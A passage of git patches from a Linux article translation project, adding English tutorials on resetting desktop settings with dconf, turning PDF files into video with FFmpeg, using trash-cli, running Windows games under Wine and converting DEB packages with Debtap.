+ garbage output. The SCO compress -H format (lzh compression method)
+ does not include a CRC but also allows some consistency checks.
+```
+
+### Conclusion
+
+As far as basic usage is concerned, there isn't much of a learning curve associated with Gunzip. We've covered pretty much everything that a beginner needs to learn about this command in order to start using it. For more information, head to its [man page][6].
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/linux-gunzip-command/
+
+作者:[Himanshu Arora][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:https://www.howtoforge.com/linux-gzip-command/
+[2]:https://www.howtoforge.com/images/linux_gunzip_command/gunzip-basic-usage.png
+[3]:https://www.howtoforge.com/images/linux_gunzip_command/big/gunzip-basic-usage.png
+[4]:https://www.howtoforge.com/images/linux_gunzip_command/gunzip-c.png
+[5]:https://www.howtoforge.com/images/linux_gunzip_command/big/gunzip-c.png
+[6]:https://linux.die.net/man/1/gzip
From 88692bfd50976741d935d573e27236741f242d38 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:11:21 +0800
Subject: [PATCH 075/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Reset=20Linux=20D?=
=?UTF-8?q?esktop=20To=20Default=20Settings=20With=20A=20Single=20Command?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Default Settings With A Single Command.md | 59 +++++++++++++++++++
1 file changed, 59 insertions(+)
create mode 100644 sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
diff --git a/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
new file mode 100644
index 0000000000..84d60dae91
--- /dev/null
+++ b/sources/tech/20171002 Reset Linux Desktop To Default Settings With A Single Command.md
@@ -0,0 +1,59 @@
+Reset Linux Desktop To Default Settings With A Single Command
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Reset-Linux-Desktop-To-Default-Settings-720x340.jpg)
+
+A while ago, we shared an article about [**Resetter**][1] - a useful piece of software that resets Ubuntu to factory defaults within a few minutes. Using Resetter, anyone can easily reset their Ubuntu system to the state it was in when first installed. Today, I stumbled upon a similar thing. No, it's not an application, but a single-line command that resets your Linux desktop settings, tweaks and customization to their default state.
+
+### Reset Linux Desktop To Default Settings
+
+This command will reset Ubuntu Unity, Gnome and MATE desktops to the default state. I tested this command on both my **Arch Linux MATE** desktop and **Ubuntu 16.04 Unity** desktop. It worked on both systems. I hope it will work on other desktops as well. I don't have any Linux desktop with GNOME as of writing this, so I couldn't confirm it. But, I believe it will work on Gnome DE as well.
+
+**A word of caution:** Please be mindful that this command will reset all customization and tweaks you made in your system, including the pinned applications in the Unity launcher or Dock, desktop panel applets, desktop indicators, your system fonts, GTK themes, Icon themes, monitor resolution, keyboard shortcuts, window button placement, menu and launcher behaviour etc.
+
+The good thing is that it only resets the desktop settings. It won't affect other applications that don't use dconf. Also, it won't delete your personal data.
+
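+If you'd like a safety net before resetting, you can dump your current settings to a file first and load them back later. This isn't part of the original tip, just a small sketch using the standard `dconf dump` and `dconf load` subcommands:
+```
+# Save the current settings.
+dconf dump / > dconf-settings-backup.txt
+
+# Restore them later if needed.
+dconf load / < dconf-settings-backup.txt
+```
+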
+Now, let us do this. To reset Ubuntu Unity or any other Linux desktop with GNOME/MATE DEs to its default settings, run:
+```
+dconf reset -f /
+```
+
+This is my Ubuntu 16.04 LTS desktop before running the above command:
+
+[![][2]][3]
+
+As you see, I have changed the desktop wallpaper and themes.
+
+This is how my Ubuntu 16.04 LTS desktop looks like after running that command:
+
+[![][2]][4]
+
+See? Now my Ubuntu desktop has gone back to the factory settings.
+
+For more details about the "dconf" command, refer to its man page.
+```
+man dconf
+```
+
+I personally prefer to use "Resetter" over the "dconf" command for this purpose, because Resetter provides more options to the user. Users can decide which applications to remove, which applications to keep, whether to keep the existing user account or create a new one, and much more. If you're too lazy to install Resetter, you can just use this "dconf" command to reset your Linux system to its default settings within a few minutes.
+
+And, that's all. Hope this helps. I will be soon here with another useful guide. Stay tuned!
+
+Cheers!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/reset-linux-desktop-default-settings-single-command/
+
+作者:[Edwin Arteaga][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com
+[1]:https://www.ostechnix.com/reset-ubuntu-factory-defaults/
+[2]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[3]:http://www.ostechnix.com/wp-content/uploads/2017/10/Before-resetting-Ubuntu-to-default-1.png ()
+[4]:http://www.ostechnix.com/wp-content/uploads/2017/10/After-resetting-Ubuntu-to-default-1.png ()
From 0133cccc86f01f4a6e2b2af43006eec31ff2ea8a Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:13:08 +0800
Subject: [PATCH 076/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Create?=
=?UTF-8?q?=20A=20Video=20From=20PDF=20Files=20In=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Create A Video From PDF Files In Linux.md | 99 +++++++++++++++++++
1 file changed, 99 insertions(+)
create mode 100644 sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
diff --git a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
new file mode 100644
index 0000000000..2cd028892a
--- /dev/null
+++ b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
@@ -0,0 +1,99 @@
+How To Create A Video From PDF Files In Linux
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Video-1-720x340.jpg)
+
+I have a huge collection of PDF files, mostly Linux tutorials, on my tablet PC. Sometimes I feel too lazy to read them on the tablet. I thought it would be better if I could create a video from the PDF files and watch it on a big-screen device like a TV or a computer. Though I have a little working experience with [**FFMpeg**][1], I wasn't sure how to create a movie file using it. After a bit of searching, I came up with a good solution. For those who want to make a movie file from a set of PDF files, read on. It is not that difficult.
+
+### Create A Video From PDF Files In Linux
+
+For this purpose, you need to install **FFMpeg** and **ImageMagick** on your system.
+
+To install FFMpeg, refer to the following link.
+
+Imagemagick is available in the official repositories of most Linux distributions.
+
+On **Arch Linux** and derivatives such as **Antergos** and **Manjaro Linux**, run the following command to install it.
+```
+sudo pacman -S imagemagick
+```
+
+**Debian, Ubuntu, Linux Mint:**
+```
+sudo apt-get install imagemagick
+```
+
+**Fedora:**
+```
+sudo dnf install imagemagick
+```
+
+**RHEL, CentOS, Scientific Linux:**
+```
+sudo yum install imagemagick
+```
+
+**SUSE, openSUSE:**
+```
+sudo zypper install imagemagick
+```
+
+After installing FFMpeg and ImageMagick, convert your PDF file to an image format such as PNG or JPG as shown below.
+```
+convert -density 400 input.pdf picture.png
+```
+
+Here, **-density 400** specifies the resolution (in DPI) at which the PDF pages are rendered to the output image file(s).
+
+The above command will convert all pages in the given PDF file to PNG format. Each page in the PDF file will be converted into a PNG file and saved in the current directory with the file names **picture-1.png**, **picture-2.png**, and so on. It will take a while depending on the number of pages in the input PDF file.
+
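+If the resulting PNG files are larger than you need, ImageMagick can also resize them in the same pass. A small sketch, where the density and target size are just example values:
+```
+convert -density 150 input.pdf -resize 1280x720 picture.png
+```
+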
+Once all pages in the PDF have been converted into PNG format, run the following command to create a video file from the PNG files.
+```
+ffmpeg -r 1/10 -i picture-%01d.png -c:v libx264 -r 30 -pix_fmt yuv420p video.mp4
+```
+
+Here,
+
+ * **-r 1/10** : Display each image for 10 seconds.
+ * **-i picture-%01d.png** : Read all pictures whose names start with **"picture-"**, followed by one digit (%01d), and end with **.png**. If the image names contain two digits (i.e. picture-10.png, picture-11.png, etc.), use (%02d) in the above command.
+ * **-c:v libx264** : Output video codec (i.e. h264).
+ * **-r 30** : Frame rate of the output video.
+ * **-pix_fmt yuv420p** : Pixel format of the output video.
+ * **video.mp4** : Output video file in .mp4 format.
+
+
+
+Hurrah! The movie file is ready! You can play it on any device that supports the .mp4 format. Next, I need to find a way to add some cool music to my video. I hope that won't be difficult either.
+
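+For what it's worth, one possible way to do that is to mux an audio track into the finished video with FFMpeg itself. A hedged sketch, assuming you have a **music.mp3** file at hand:
+```
+# copy the video stream as-is, encode the audio to AAC, and stop at the shorter of the two inputs
+ffmpeg -i video.mp4 -i music.mp3 -c:v copy -c:a aac -shortest video_with_music.mp4
+```
+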
+If you want a different pixel resolution, you don't have to start all over again. Just convert the output video file to any other higher or lower resolution of your choice, say 720p, as shown below.
+```
+ffmpeg -i video.mp4 -vf scale=-1:720 video_720p.mp4
+```
+
+Please note that creating a video using FFMpeg requires a reasonably powerful PC. While converting videos, FFMpeg will consume most of your system resources, so I recommend doing this on a high-end system.
+
+And, that's all for now, folks. Hope you find this useful. More good stuff to come. Stay tuned!
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.ostechnix.com/create-video-pdf-files-linux/
+
+作者:[SK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.ostechnix.com/author/sk/
+[1]:https://www.ostechnix.com/20-ffmpeg-commands-beginners/
+[2]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=reddit (Click to share on Reddit)
+[3]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=twitter (Click to share on Twitter)
+[4]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=facebook (Click to share on Facebook)
+[5]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=google-plus-1 (Click to share on Google+)
+[6]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=linkedin (Click to share on LinkedIn)
+[7]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=pocket (Click to share on Pocket)
+[8]:whatsapp://send?text=How%20To%20Create%20A%20Video%20From%20PDF%20Files%20In%20Linux%20https%3A%2F%2Fwww.ostechnix.com%2Fcreate-video-pdf-files-linux%2F (Click to share on WhatsApp)
+[9]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=telegram (Click to share on Telegram)
+[10]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=email (Click to email this to a friend)
+[11]:https://www.ostechnix.com/create-video-pdf-files-linux/#print (Click to print)
From 4f073524af507a310953c53c7360bc4c9592fd24 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:14:16 +0800
Subject: [PATCH 077/371] add done: 20171004 How To Create A Video From PDF
Files In Linux.md
---
...04 How To Create A Video From PDF Files In Linux.md | 10 ----------
1 file changed, 10 deletions(-)
diff --git a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
index 2cd028892a..27aa32dc77 100644
--- a/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
+++ b/sources/tech/20171004 How To Create A Video From PDF Files In Linux.md
@@ -87,13 +87,3 @@ via: https://www.ostechnix.com/create-video-pdf-files-linux/
[a]:https://www.ostechnix.com/author/sk/
[1]:https://www.ostechnix.com/20-ffmpeg-commands-beginners/
-[2]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=reddit (Click to share on Reddit)
-[3]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=twitter (Click to share on Twitter)
-[4]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=facebook (Click to share on Facebook)
-[5]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=google-plus-1 (Click to share on Google+)
-[6]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=linkedin (Click to share on LinkedIn)
-[7]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=pocket (Click to share on Pocket)
-[8]:whatsapp://send?text=How%20To%20Create%20A%20Video%20From%20PDF%20Files%20In%20Linux%20https%3A%2F%2Fwww.ostechnix.com%2Fcreate-video-pdf-files-linux%2F (Click to share on WhatsApp)
-[9]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=telegram (Click to share on Telegram)
-[10]:https://www.ostechnix.com/create-video-pdf-files-linux/?share=email (Click to email this to a friend)
-[11]:https://www.ostechnix.com/create-video-pdf-files-linux/#print (Click to print)
From 6c37b7dc5ab02e30959866529e049c68c8583351 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:17:26 +0800
Subject: [PATCH 078/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Trash-Cli=20:=20A?=
=?UTF-8?q?=20Command=20Line=20Interface=20For=20Trashcan=20On=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...nd Line Interface For Trashcan On Linux.md | 145 ++++++++++++++++++
1 file changed, 145 insertions(+)
create mode 100644 sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
diff --git a/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md b/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
new file mode 100644
index 0000000000..29902a588f
--- /dev/null
+++ b/sources/tech/20171003 Trash-Cli - A Command Line Interface For Trashcan On Linux.md
@@ -0,0 +1,145 @@
+Trash-Cli : A Command Line Interface For Trashcan On Linux
+======
+Everyone knows about the `Trashcan`, which is common to all users, whether on Linux, Windows, or Mac. Whenever you delete a file or folder, it is moved to the trash.
+
+Note that moving files to the trash does not free up space on the file system until the Trashcan is emptied.
+
+The trash stores deleted files temporarily, which helps us restore them when necessary. If you don't want these files anymore, delete them permanently (empty the trash).
+
+Be aware that you won't find any files or folders in the trash when you delete them using the `rm` command, so think twice before running rm. If you make a mistake, that's it; the file is gone and you can't easily get it back.
+
+Trash is a feature provided by desktop environments such as GNOME, KDE, and XFCE, as per the [freedesktop.org specification][1]. When you delete a file or folder from the file manager, it goes to the trash, and the trash folder can be found at `$HOME/.local/share/Trash`.
+
+The trash folder contains two subfolders, `files` & `info`. The `files` folder stores the actual deleted files and folders, while the `info` folder contains each deleted item's information, such as its original file path and deletion date & time, in a separate file.
+
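+As an illustration, here is a hedged sketch of what an `info` entry might look like for the `2g.txt` file used in the examples below (the exact layout is defined by the freedesktop.org spec; the path and timestamp simply mirror the listing shown later):
+```
+$ cat ~/.local/share/Trash/info/2g.txt.trashinfo
+[Trash Info]
+Path=/home/magi/magi/2g.txt
+DeletionDate=2017-10-01T01:40:50
+
+```
+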
+You might ask, why would you want a CLI utility when there's already a GUI Trashcan? Most *NIX folks (including me) prefer playing around on the CLI instead of the GUI, even when working on a GUI-based system. So, if someone is looking for a CLI-based trashcan, this is the right choice for them.
+
+### What's Trash-Cli
+
+[trash-cli][2] is a command line interface for Trashcan utility compliant with the FreeDesktop.org trash specifications. It stores the name, original path, deletion date, and permissions of each trashed file.
+
+### How to Install Trash-Cli in Linux
+
+Trash-Cli is available in the official repositories of most Linux distributions, so run the appropriate command below to install it.
+
+For **`Debian/Ubuntu`** , use [apt-get command][3] or [apt command][4] to install Trash-Cli.
+```
+$ sudo apt install trash-cli
+
+```
+
+For **`RHEL/CentOS`** , use [YUM Command][5] to install Trash-Cli.
+```
+$ sudo yum install trash-cli
+
+```
+
+For **`Fedora`** , use [DNF Command][6] to install Trash-Cli.
+```
+$ sudo dnf install trash-cli
+
+```
+
+For **`Arch Linux`** , use [Pacman Command][7] to install Trash-Cli.
+```
+$ sudo pacman -S trash-cli
+
+```
+
+For **`openSUSE`** , use [Zypper Command][8] to install Trash-Cli.
+```
+$ sudo zypper in trash-cli
+
+```
+
+If your distribution doesn't offer Trash-Cli, you can easily install it from pip. Your system should have the pip package manager in order to install Python packages.
+```
+$ sudo pip install trash-cli
+Collecting trash-cli
+ Downloading trash-cli-0.17.1.14.tar.gz
+Installing collected packages: trash-cli
+ Running setup.py bdist_wheel for trash-cli ... done
+Successfully installed trash-cli-0.17.1.14
+
+```
+
+### How to Use Trash-Cli
+
+It's not a big deal since it offers native-feeling syntax. It provides the following commands.
+
+ * **`trash-put:`** Delete files and folders.
+ * **`trash-list:`** Print deleted files and folders.
+ * **`trash-restore:`** Restore a file or folder from trash.
+ * **`trash-rm:`** Remove individual files from the trashcan.
+ * **`trash-empty:`** Empty the trashcan(s).
+
+
+
+Let's try some examples to experiment with it.
+
+1) Delete files and folders: In our case, we are going to send a file named `2g.txt` and a folder named `magi` to the trash by running the following command.
+```
+$ trash-put 2g.txt magi
+
+```
+
+You can see the same in file manager.
+
+2) Print deleted files and folders: To view deleted files and folders, run the following command. It shows detailed information about the deleted files and folders, such as name, deletion date & time, and original file path.
+```
+$ trash-list
+2017-10-01 01:40:50 /home/magi/magi/2g.txt
+2017-10-01 01:40:50 /home/magi/magi/magi
+
+```
+
+3) Restore a file or folder from trash: At any point in time you can restore files and folders by running the following command. It will ask you to enter the number of the item you want to restore. In our case, we are going to restore the `2g.txt` file, so my choice is `0`.
+```
+$ trash-restore
+ 0 2017-10-01 01:40:50 /home/magi/magi/2g.txt
+ 1 2017-10-01 01:40:50 /home/magi/magi/magi
+What file to restore [0..1]: 0
+
+```
+
+4) Remove individual files from the trashcan: If you want to remove specific files from the trashcan, run the following command. In our case, we are going to remove the `magi` folder.
+```
+$ trash-rm magi
+
+```
+
+5) Empty the trashcan: To remove everything from the trashcan, run the following command.
+```
+$ trash-empty
+
+```
+
+6) Remove files older than X days: Alternatively, you can remove items older than X days by running the following command. In our case, we are going to remove items older than `10` days from the trashcan.
+```
+$ trash-empty 10
+
+```
+
+trash-cli works great, but if you want to try an alternative, give [gvfs-trash][9] & [autotrash][10] a try.
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/trash-cli-command-line-trashcan-linux-system/
+
+作者:[2daygeek][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://freedesktop.org/wiki/Specifications/trash-spec/
+[2]:https://github.com/andreafrancia/trash-cli
+[3]:https://www.2daygeek.com/apt-get-apt-cache-command-examples-manage-packages-debian-ubuntu-systems/
+[4]:https://www.2daygeek.com/apt-command-examples-manage-packages-debian-ubuntu-systems/
+[5]:https://www.2daygeek.com/yum-command-examples-manage-packages-rhel-centos-systems/
+[6]:https://www.2daygeek.com/dnf-command-examples-manage-packages-fedora-system/
+[7]:https://www.2daygeek.com/pacman-command-examples-manage-packages-arch-linux-system/
+[8]:https://www.2daygeek.com/zypper-command-examples-manage-packages-opensuse-system/
+[9]:http://manpages.ubuntu.com/manpages/trusty/man1/gvfs-trash.1.html
+[10]:https://github.com/bneijt/autotrash
From 7bd2178878959068c011a69a266e10179f4716b4 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:22:03 +0800
Subject: [PATCH 079/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20Games=20You?=
=?UTF-8?q?=20Can=20Play=20on=20Linux=20with=20Wine?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...0 Games You Can Play on Linux with Wine.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
diff --git a/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md b/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
new file mode 100644
index 0000000000..5bab9d8c65
--- /dev/null
+++ b/sources/tech/20171005 10 Games You Can Play on Linux with Wine.md
@@ -0,0 +1,112 @@
+10 Games You Can Play on Linux with Wine
+======
+![](https://www.maketecheasier.com/assets/uploads/2017/09/wine-games-feat.jpg)
+
+Linux _does_ have games. It has a lot of them, actually. Linux is a thriving platform for indie gaming, and it's not too uncommon for Linux to be supported on day one by top indie titles. In stark contrast, however, Linux is still largely ignored by the big-budget AAA developers, meaning that the games your friends are buzzing about probably won't be getting a Linux port anytime soon.
+
+It's not all bad, though. Wine, the Windows compatibility layer for Linux, Mac, and BSD systems, is making huge strides in both the number of titles supported and performance. In fact, a lot of big name games now work under Wine. No, you won't get native performance, but they are playable and can actually run very well, depending on your system. Here are some games that it might surprise you can run with Wine on Linux.
+
+### 10. World of Warcraft
+
+![World of Warcraft Wine][1]
+
+The venerable king of MMORPGs is still alive and going strong. Even though it might not be the most graphically advanced game, it still takes some power to crank all the settings up to max. World of Warcraft has actually worked under Wine for years. Until this latest expansion, WoW supported OpenGL for its Mac version, making it very easy to get working under Linux. That's not quite the case anymore.
+
+You'll need to run WoW with DX9 and will definitely see some benefit from the [Gallium Nine][2] patches, but you can confidently make the switch over to Linux without missing raid night.
+
+### 9. Skyrim
+
+![Skyrim Wine][3]
+
+Skyrim's not exactly new, but it's still fueled by a thriving modding community. You can now easily enjoy Skyrim and its many, many mods if you have a Linux system with enough resources to handle it all. Remember that Wine uses more system power than running the game natively, so account for that in your mod usage.
+
+### 8. StarCraft II
+
+![StarCraft II Wine][4]
+
+StarCraft II is easily one of the most popular RTS games on the market and works very well under Wine. It is actually one of the best performing games under Wine. That means that you can play your favorite RTS on Linux with minimal hassle and near-native performance.
+
+Given the competitive nature of this game, you obviously need the game to run well. Have no fear there. You should have no problem playing competitively with adequate hardware.
+
+This is an instance where you'll benefit from the "staging" patches, so continue using them when you're getting the game set up.
+
+### 7. Fallout 3/New Vegas
+
+![Fallout 3 Wine][5]
+
+Before you ask, Fallout 4 is on the verge of working. At the time you're reading this, it might. For now, though, Fallout 3 and New Vegas both work great, both with and without mods. These games run very well under Wine and can even handle loads of mods to keep them fresh and interesting. It doesn't seem like a bad compromise to hold you over until Fallout 4 support matures.
+
+### 6. Doom (2016)
+
+![Doom Wine][6]
+
+Doom is one of the most exciting shooters of the past few years, and it runs very well under Wine with the latest versions and the "staging" patches. Both single player and multiplayer work great, and you don't need to spend loads of time configuring Wine and tweaking settings. Doom just works. So, if you're looking for a brutal AAA shooter on Linux, consider giving Doom a try.
+
+### 5. Guild Wars 2
+
+![Guild Wars 2 Wine][7]
+
+Guild Wars 2 is a sort-of hybrid MMO/dungeon crawler without a monthly fee. It's very popular and boasts some really innovative features for the genre. It also runs smoothly on Linux with Wine.
+
+Guild Wars 2 isn't some ancient MMO either. It's tried to keep itself modern graphically and has fairly high resolution textures and visual effects for the genre. All of it looks and works very well under Wine.
+
+### 4. League Of Legends
+
+![League Of Legends Wine][8]
+
+There are two top players in the MOBA world: DoTA2 and League of Legends. Valve ported DoTA2 to Linux some time ago, but League of Legends has never been made available to Linux gamers. If you're a Linux user and a fan of League, you can still play your favorite MOBA through Wine.
+
+League of Legends is an interesting case. The game itself runs fine, but the installer breaks because it requires Adobe Air. There are some installer scripts available from Lutris and PlayOnLinux that get you through the process. Once it's installed, you should have no problem running League and even playing it smoothly in competitive situations.
+
+### 3. Hearthstone
+
+![HearthStone Wine][9]
+
+Hearthstone is a popular and addictive free-to-play digital card game that's available on a variety of platforms … except Linux. Don't worry, it works very well in Wine. Hearthstone is such a lightweight game that it's actually playable through Wine on even the lowest-powered systems. That's good news, too, because Hearthstone is another competitive game where performance matters.
+
+Hearthstone doesn't require any special configuration or even patches. It just works.
+
+### 2. Witcher 3
+
+![Witcher 3 Wine][10]
+
+If you're surprised to see this one here, you're not alone. With the latest "staging" patches, The Witcher 3 finally works. Despite originally being promised a native release, Linux gamers have had to wait a good long while to get the third installment in the Witcher franchise.
+
+Don't expect everything to be perfect just yet. Support for Witcher 3 is _very_ new, and some things might not work as expected. That said, if you only have Linux to game on, and you're willing to deal with a couple of rough edges, you can enjoy this awesome game for the first time with few, if any, troubles.
+
+### 1. Overwatch
+
+![Overwatch Wine][11]
+
+Finally, there's yet another "white whale" for Linux gamers. Overwatch has been an elusive target that many feel should have been working on Wine since day one. Most Blizzard games have. Overwatch was a very different case. It only ever supported DX11, and that was a serious pain point for Wine.
+
+Overwatch doesn't have the best performance yet, but you can definitely still play Blizzard's wildly popular shooter using a specially-patched version of Wine with the "staging" patches and additional ones just for Overwatch. That means Linux gamers wanted Overwatch so badly that they developed a special set of patches for it.
+
+There were certainly games left off of this list. Most were omitted due to popularity or only conditional support under Wine. Other Blizzard games, like Heroes of the Storm and Diablo III, also work, but this list would have been even more dominated by Blizzard, and that's not the point.
+
+If you're going to try playing any of these games, consider using the "staging" or [Gallium Nine versions][2] of Wine. Many of the games here won't work without them. Even still, the latest patches and improvements land in "staging" long before they make it into the mainstream Wine release. Using it will keep you on the leading edge of progress.
+
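+How you get a staging build depends on your distribution. As a rough sketch, on Arch Linux it is typically available as a regular package (other distributions may need the WineHQ repositories instead):
+```
+sudo pacman -S wine-staging
+wine --version    # a staging build reports something like "wine-2.x (Staging)"
+```
+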
+Speaking of progress, right now Wine is making massive strides in DirectX11 support. While that doesn't mean much to Windows gamers, it's a huge deal for Linux. Most new games support DX11 and DX12, and until recently Wine only supported DX9. With DX11 support, Wine is gaining support for loads of games that were previously unplayable. So keep checking regularly to see if your favorite games from Windows started working in Wine. You might be very pleasantly surprised.
+
+--------------------------------------------------------------------------------
+
+via: https://www.maketecheasier.com/games-play-on-linux-with-wine/
+
+作者:[Nick Congleton][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.maketecheasier.com/author/nickcongleton/
+[1]:https://www.maketecheasier.com/assets/uploads/2017/09/wow.jpg (World of Warcraft Wine)
+[2]:https://www.maketecheasier.com/install-wine-gallium-nine-linux
+[3]:https://www.maketecheasier.com/assets/uploads/2017/09/skyrim.jpg (Skyrim Wine)
+[4]:https://www.maketecheasier.com/assets/uploads/2017/09/sc2.jpg (StarCraft II Wine)
+[5]:https://www.maketecheasier.com/assets/uploads/2017/09/Fallout_3.jpg (Fallout 3 Wine)
+[6]:https://www.maketecheasier.com/assets/uploads/2017/09/doom.jpg (Doom Wine)
+[7]:https://www.maketecheasier.com/assets/uploads/2017/09/gw2.jpg (Guild Wars 2 Wine)
+[8]:https://www.maketecheasier.com/assets/uploads/2017/09/League_of_legends.jpg (League Of Legends Wine)
+[9]:https://www.maketecheasier.com/assets/uploads/2017/09/HearthStone.jpg (HearthStone Wine)
+[10]:https://www.maketecheasier.com/assets/uploads/2017/09/witcher3.jpg (Witcher 3 Wine)
+[11]:https://www.maketecheasier.com/assets/uploads/2017/09/Overwatch.jpg (Overwatch Wine)
From 1bf6595a19312aa4b8857bd445dcec7c6ff5e036 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sat, 6 Jan 2018 13:25:31 +0800
Subject: [PATCH 080/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20To=20Conver?=
=?UTF-8?q?t=20DEB=20Packages=20Into=20Arch=20Linux=20Packages?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...t DEB Packages Into Arch Linux Packages.md | 169 ++++++++++++++++++
1 file changed, 169 insertions(+)
create mode 100644 sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
diff --git a/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md b/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
new file mode 100644
index 0000000000..6287fad11f
--- /dev/null
+++ b/sources/tech/20171006 How To Convert DEB Packages Into Arch Linux Packages.md
@@ -0,0 +1,169 @@
+How To Convert DEB Packages Into Arch Linux Packages
+======
+![](https://www.ostechnix.com/wp-content/uploads/2017/10/Debtap-720x340.png)
+
+We already learned how to [**build packages for multiple platforms**][1], and how to **[build packages from source][2]**. Today, we are going to learn how to convert DEB packages into Arch Linux packages. You might ask, the **AUR** is the largest software repository on the planet, and almost all software is available in it. Why would I need to convert a DEB package into an Arch Linux package? True! However, some packages cannot be compiled (closed-source packages) or cannot be built from the AUR for various reasons, such as errors during compilation or unavailable files. Or, the developer is too lazy to build a package in the AUR, or s/he doesn't want to create an AUR package. In such cases, we can use this quick and dirty method to convert DEB packages into Arch Linux packages.
+
+### Debtap - Convert DEB Packages Into Arch Linux Packages
+
+For this purpose, we are going to use a utility called **"Debtap"**. The name stands for **DEB** **T**o **A**rch (Linux) **P**ackage. Debtap is available in the AUR, so you can install it using AUR helper tools such as [**Pacaur**][3], [**Packer**][4], or [**Yaourt**][5].
+
+To install debtap using pacaur, run:
+```
+pacaur -S debtap
+```
+
+Using Packer:
+```
+packer -S debtap
+```
+
+Using Yaourt:
+```
+yaourt -S debtap
+```
+
+Also, your Arch system should have the **bash**, **binutils**, **pkgfile** and **fakeroot** packages installed.
+
+After installing Debtap and all of the above-mentioned dependencies, run the following command to create/update the pkgfile and debtap database.
+```
+sudo debtap -u
+```
+
+Sample output would be:
+```
+==> Synchronizing pkgfile database...
+:: Updating 6 repos...
+ download complete: archlinuxfr [ 151.7 KiB 67.5K/s 5 remaining]
+ download complete: multilib [ 319.5 KiB 36.2K/s 4 remaining]
+ download complete: core [ 707.7 KiB 49.5K/s 3 remaining]
+ download complete: testing [ 1716.3 KiB 58.2K/s 2 remaining]
